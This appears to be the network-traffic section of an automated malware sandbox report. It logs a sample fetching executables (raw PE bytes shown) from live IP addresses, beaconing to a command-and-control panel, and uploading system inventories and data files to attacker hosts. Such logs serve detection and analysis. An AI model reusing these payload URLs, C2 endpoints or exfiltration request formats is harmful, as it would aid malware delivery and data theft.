00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:04:57 GMTContent-Type: application/octet-streamContent-Length: 1854976Last-Modified: Mon, 16 Dec 2024 09:29:36 GMTConnection: keep-aliveETag: "675ff300-1c4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6c 6d 73 65 63 74 69 00 b0 1a 00 00 70 50 00 00 a8 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 63 67 64 64 62 6d 76 00 10 00 00 00 20 6b 00 00 06 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6b 00 00 22 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 10:09:19 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016040001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016041001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /kNcZsqQOSglxukmuLodY1734167391 HTTP/1.1Host: home.twentygr20sb.topAccept: /Content-Type: application/jsonContent-Length: 457300Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 33 34 33 34 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic	HTTP traffic detected: GET /kNcZsqQOSglxukmuLodY1734167391?argument=FZqYgjrfNlBaz3kN1734343413 HTTP/1.1Host: home.twentygr20sb.topAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016042001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016043001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016044001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentygr20sb.topAccept: /Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------dk4OrBOxmT6PfLcSdEGcwNData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 6b 34 4f 72 42 4f 78 6d 54 36 50 66 4c 63 53 64 45 47 63 77 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 6f 78 75 6d 69 6b 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 3d 03 d1 21 00 80 74 7f 4b a0 82 2f e8 6a 5a ef 71 45 26 1c 7e f7 88 a7 95 38 c1 34 61 1b b2 fa 7e 37 cc 76 2f 4c 15 a5 d0 77 0e 7e 71 ce 7c e3 48 f8 72 dd f8 f9 d9 65 1b 02 d1 99 cc 8b 6e 20 81 fb 96 82 02 09 4a 5e 0b c4 59 30 61 1a f2 79 e9 27 ef b2 c4 67 91 36 8d ba 26 c7 98 d6 7d c6 b8 8a 7a 86 48 fd 66 ed 08 33 bd 4b ef 19 9b 80 da a4 5b 29 3e f4 c4 ce cb 34 6a ac e0 7a f4 7a a7 46 a7 9e 66 5a 6e 22 4c 89 10 92 26 c4 40 2f ff 4b 2f 82 71 d8 b5 d6 3f 26 9c b7 ef b8 9a b6 cf 7d a7 9b 6f 2d 5d 02 3f 90 52 e7 b7 31 e1 c7 e1 76 9b 22 e2 ec b1 51 79 c0 fa 4b ec fb 4f f0 38 25 4c 27 03 9e 0c 29 3b 23 ef 6b 66 9a 8d 72 ff ef e4 82 39 ff 5a 10 8b a3 43 ab 3a 6a 29 06 61 4a 9e 14 6e bb be 73 5e 60 4a 8c 37 1c fc 3b 7e 13 0a 3f 73 18 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 6b 34 4f 72 42 4f 78 6d 54 36 50 66 4c 63 53 64 45 47 63 77 4e 2d 2d 0d 0a Data Ascii: --------------------------dk4OrBOxmT6PfLcSdEGcwNContent-Disposition: form-data; name="file"; filename="Moxumiku.bin"Content-Type: application/octet-stream/=!tK/jZqE&~84a~7v/Lw~q\|Hren J^Y0ay'g6&}zHf3K[)>4jzzFfZn"L&@/K/q?&}o-]?R1v"QyKO8%L');#kfr9ZC:j)aJns^`J7;~?s4--------------------------dk4OrBOxmT6PfLcSdEGcwN--
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentygr20sb.topAccept: /Content-Length: 70692Content-Type: multipart/form-data; boundary=------------------------27DrIuilFi10g9UY2Cq1cKData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 44 72 49 75 69 6c 46 69 31 30 67 39 55 59 32 43 71 31 63 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d 6f 71 61 78 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f7 5d 7a 53 ec 76 c4 c7 f8 74 2b b0 f4 42 8b 83 da 1b 21 d4 1b 36 bf 65 bc e2 1d 12 ea 51 32 6d 24 0b 0b 9b f6 40 9a 93 83 67 b2 3d f8 5e 08 6c a5 c5 1c a1 76 fb 83 24 fb ea 8f 29 ed 02 a1 c9 a0 2a 99 a1 22 a3 37 ce 40 2e ff e6 12 cf 31 84 86 8b 7a b7 70 0a 00 d5 ed 30 53 fe a2 23 bb 05 a0 d3 9e 06 02 9c 51 df 1a 46 88 a9 e5 69 0d 79 63 11 92 37 df 4a cc 7d e9 f7 9e 53 b2 6a e1 45 91 6e 66 51 fd c6 d7 45 ba 80 8d d1 be b6 1a 2f 56 dd 28 f2 87 bf 16 cd 73 8f 67 5b 40 be 50 df 26 10 1a 58 76 0a 46 5d 5b ec 41 11 00 0d 57 3c b2 f3 43 ef 1f e1 87 3f 14 24 c1 27 99 e4 85 3b 8a 34 c5 c4 2f 7f 6c 44 d3 be 16 cb ac 6b 79 53 64 c6 68 81 66 67 c2 78 7e 79 fc 0e 6a e6 6d ed 16 10 c4 84 4c c5 b3 29 23 14 8f f1 9b a5 d9 f0 d3 b7 58 a6 c8 e1 b5 3d 61 15 7d 14 a8 58 5c 22 af 41 6e 94 5e c6 74 5b 3e b3 34 37 6a 32 5b 76 5b 4f 61 88 62 d4 1f 01 98 99 8b 0c 69 3c bd 37 bb 76 8f 55 8a 34 1e 4a 38 f6 fa cb 13 9b 83 1e 67 85 44 4c 96 f2 a8 84 55 37 85 27 b7 f9 ad 96 36 90 6f f6 91 11 6b 5e 91 e2 77 f4 b6 b1 b4 6d bb 39 dc e0 13 e4 ad f1 39 65 33 cd 12 81 8a 25 aa ee 50 d3 99 dd 58 1e 83 de 13 d1 9b 27 9b cf 78 57 c1 13 df 30 64 10 19 45 51 56 54 d8 7d 30 3a 33 83 5f a8 56 40 55 c0 b6 cc ce 65 16 f4 51 e2 5a bf aa 95 5b cd 4d aa 96 fc 60 e4 35 c9 ab d9 f2 6b 64 ab 4c 7e 46 fc b9 24 7e 00 e2 b8 31 52 50 2c 69 2f 52 c3 06 fc 02 d2 f0 77 a2 4a b0 4a ae 69 35 86 d2 02 28 9d 3b 41 68 b5 a3 29 ee c7 03 15 56 08 c2 8b 28 c0 fd 02 7b 75 19 5e 32 a6 91 d6 cc b3 f3 99 8c 74 f3 23 77 67 2e 1a 4a cc aa 20 4d fa ed d7 73 e3 69 34 24 da 76 24 3a 87 d2 e1 7e cf 0a 78 e3 43 da 68 55 b8 0f 84 1f b5 cf 8a d2 aa 0c 2d 18 c2 dd 16 10 91 8b 4a 27 61 bd 22 dd 19 04 76 2c e6 22 36 cd 19 5b 8f 5f e3 9b 68 a5 02 97 5e 8b 9b 74 d4 55 0b 9e bc 73 38 30 3c 31 12 55 72 d3 3c 8f 58 59 9f ff 11 64 6f 1a cd 3f 6b d0 af 9b ca 3a 1c 68 d1 c2 0f 0f a3 59 a1 0d ad cb 1e bf c1 ad 8d 75 c6 38 b6 36 0e 81 60 d9 4e 7f b0 67 dd e2 19 51 cc b8 13 0b e5 c8 3b 95 f2 43 6d 26 c3 8c a8 cc 0a a6 0d 57 14 70 17 8f d2 85 58 5c 2b c7 2d 58 5d 53 93 b1 32 80 9a 5e 65 0e 5b bf e0 6f 54 37 7c 44 b9 37 fe f0 b0 18 28 f8 86 b3 1b 3b bf f5 d0 21 ef 88 33 d2 47 89 fd 4f a7 81 08 04 26 b6 3c e9 98 0f dd c2 0f 85 68 b5 a2 54 ac 4c 18 64 8b 43 88 e8 e0 31 be ea a6 f9 46 3d 99 3f c9 a6 7f cf fa f7 b4 99 dd 36 21 06 c1 47 15 64 fa 9a 79 8a d2 8d 5f 51 03 2b f3 06
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016045001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="build"stok------HJEBGHIEBFIJKECBKFHD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016046001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 30 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016047001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
